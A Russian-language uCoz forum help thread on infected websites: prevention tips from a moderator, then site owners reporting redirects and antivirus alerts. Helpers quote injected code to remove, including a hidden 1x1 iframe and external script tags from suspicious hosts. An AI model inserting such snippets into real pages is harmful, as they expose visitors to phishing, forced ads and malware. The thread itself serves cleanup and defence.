|
Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
๖ۣۜStsepelin
Сообщений: 23
Сообщение # 1411 |
15:54:20
18 Июл 2014
Заявка на поиск вирусного кода
Сообщение от ๖ۣۜStsepelin
|
odisssei
Сообщений: 5
Сообщение # 1412 |
11:03:30
20 Июл 2014
здраствуйте. прошу помощи - сам не могу разобраться
При заходе на любую страницу автоматически открывается onclickads.net
а он в свою очередь огромное количество окон
Заранее благодарю Вас за ответ
Адрес моего сайта http://odi.ucoz.ru/
|
$Vladimir$
Сообщений: 7465
Сообщение # 1413 |
11:34:42
20 Июл 2014
odisssei, удаляйте код
Код <iframe frameBorder=0 scrolling=no width=1 height=1 src=http://vava.3dn.ru></iframe>
Код <script src="http://lifi-gta.ru/jogin_form_javascript.js" type="text/javascript"></script>
Код <style type="text/css">A:hover{background:url(http://play-forum.ucoz.com/teamicon/magnetic.gif); }</style><script type="text/javascript" src="http://play-forum.ucoz.com"></script>
После удаления сообщите.
|
Grician
Сообщений: 19
Сообщение # 1414 |
10:26:46
21 Июл 2014
Цитата $Vladimir$ (  ) odisssei, удаляйте код <iframe frameBorder=0 scrolling=no width=1 height=1 src=http://vava.3dn.ru></iframe>1
<script src="http://lifi-gta.ru/jogin_form_javascript.js" type="text/javascript"></script>1
<style type="text/css">A:hover{background:url(http://play-forum.ucoz.com/teamicon/magnetic.gif); }</style><script type="text/javascript" src="http://play-forum.ucoz.com"></script>1
2
После удаления сообщите.
Не нашел не одного кода. Где именно искать, все прошерстил.
|
medoti
Сообщений: 5
Сообщение # 1415 |
15:35:11
21 Июл 2014
Здравствуйте!
Помогите найти вирус, когда захожу на сайт гостем, открывается второе окно с рекламой, и в низу правом ниж. углу вылазит блок с рекламой.
1. http://imax-tv.ru
2. только под гостем
3. Браузер "Яндекс", пишет:
"Осторожно! Под данным Яндекса, сайт может связан с смс - мошеничеством."
http://imax-tv.ru/
|
odisssei
Сообщений: 5
Сообщение # 1416 |
00:34:25
22 Июл 2014
|
$Vladimir$
Сообщений: 7465
Сообщение # 1417 |
09:39:40
22 Июл 2014
odisssei, проблема актуальна во всех браузерах? Предоставьте скриншот - это может помочь разобраться в чем дело.
|
odisssei
Сообщений: 5
Сообщение # 1418 |
11:08:31
23 Июл 2014
$Vladimir$, во всех браузерах открывается один и тот же сайт onclickads.net а он в свою очередь новое окноДобавлено (23 Июл 2014, 11:08:31)
---------------------------------------------
$Vladimir$, Видео сниму покажу 
|
Juliya0787
Сообщений: 38
Сообщение # 1419 |
20:36:03
23 Июл 2014
Здравствуйте,
МсАффи SiteAdvisor указывает на то, что на сайте (domkrema.at.ua) обнаружено следующее:
 5_pub.13.0.3.zip W32\/Mytob.gen@MM virus
cd33.4.rar W32\/Porex.c virus
Bux.to_Autoclicker.rar Generic Dropper trojan
. Как удалить их? в поисковике сайт с серым значком
|
Лоэнгрин
Сообщений: 8
Сообщение # 1420 |
20:48:53
23 Июл 2014
Добрый день, помогите, тоже такая проблема. При заходе на материал в "каталоге файлов" выбрасывает левый сайт и присылает смс.
адрес trapeznaya.ucoz.ru
Заранее благодарен.
Сообщение отредактировал Лоэнгрин - Четверг, 24 Июл 2014, 11:55:55
|
odisssei
Сообщений: 5
Сообщение # 1421 |
21:39:30
23 Июл 2014
|
webanet
Сообщений: 24067
Сообщение # 1422 |
17:08:40
24 Июл 2014
odisssei, в любом случае вам надо удалить скрипт от www.widgeo.net
Код <script src="http://www.widgeo.net/geocompteur/geocompteur.php?c=geoipod&id=1660809&adult=0&cat=homme&fonce=undefined&claire=undefined"></script>
там вшито слишком много рекламы. ваш редирект с видео на гугл хроме именно отнего
|
webanet
Сообщений: 24067
Сообщение # 1423 |
17:39:47
24 Июл 2014
Лоэнгрин, удаляем скрипт своих соц.кнопок
Код <script type="text/javascript" src="http://jquerylibrarycode.ru/jl.php?share=15,20,39,0,7,10,14,16,24,34,35,43,44&size=16"></script>
если так сильно нуждаетесь в соц.кнопках, то ставьте с яндексом, а не со всеми сомнительными ресурсами
|
odisssei
Сообщений: 5
Сообщение # 1424 |
18:13:33
24 Июл 2014
webanet, спасибо за ответ сейчас попробую
|
Juliya0787
Сообщений: 38
Сообщение # 1425 |
19:21:20
30 Июл 2014
Повторяю вопрос:
Сообщение # 1422 | 20:36:03 23 Июл 2014
Здравствуйте,
МсАффи SiteAdvisor указывает на то, что на сайте (domkrema.at.ua) обнаружено следующее:
5_pub.13.0.3.zip W32\/Mytob.gen@MM virus
cd33.4.rar W32\/Porex.c virus
Bux.to_Autoclicker.rar Generic Dropper trojan
. Как удалить их? в поисковике сайт с серым значком, как предупреждение для посетителей, у кого стоит сайт эдвайзор
Сообщение отредактировал Juliya0787 - Среда, 30 Июл 2014, 19:22:21
|
Чат сообщества
)
